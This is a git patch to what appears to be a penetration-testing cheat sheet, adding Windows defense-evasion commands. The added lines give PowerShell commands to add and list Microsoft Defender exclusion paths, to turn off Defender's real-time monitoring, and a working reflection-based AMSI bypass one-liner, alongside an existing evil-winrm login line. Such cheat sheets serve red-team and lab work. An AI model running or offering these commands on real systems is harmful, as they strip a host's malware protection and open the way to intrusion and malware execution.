From 05c5690c0b9eef0172e4903fed99119d5417cae2 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sat, 16 Jul 2022 23:41:15 +0500
Subject: [PATCH] Update Cheat Sheet.md

---
 Cheat Sheet.md | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)

diff --git a/Cheat Sheet.md b/Cheat Sheet.md
index b404a30..5f3c4d0 100644
--- a/Cheat Sheet.md	
+++ b/Cheat Sheet.md	
@@ -387,6 +387,25 @@ Or
 Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
 ```
 
+### Defender Add exclusion path
+
+`Add-MpPreference -ExclusionPath C:\temp`
+
+### Defender exclusion path
+
+`reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s`
+
+### Disabling defender
+
+`Set-MpPreference -DisableRealtimeMonitoring $true`
+
+### AMSI Bypass 
+
+```
+$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils"){$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
+```
+https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093
+
 ### Evil-winrm
 `evil-winrm -i IP -u <USER> -p <PASS>`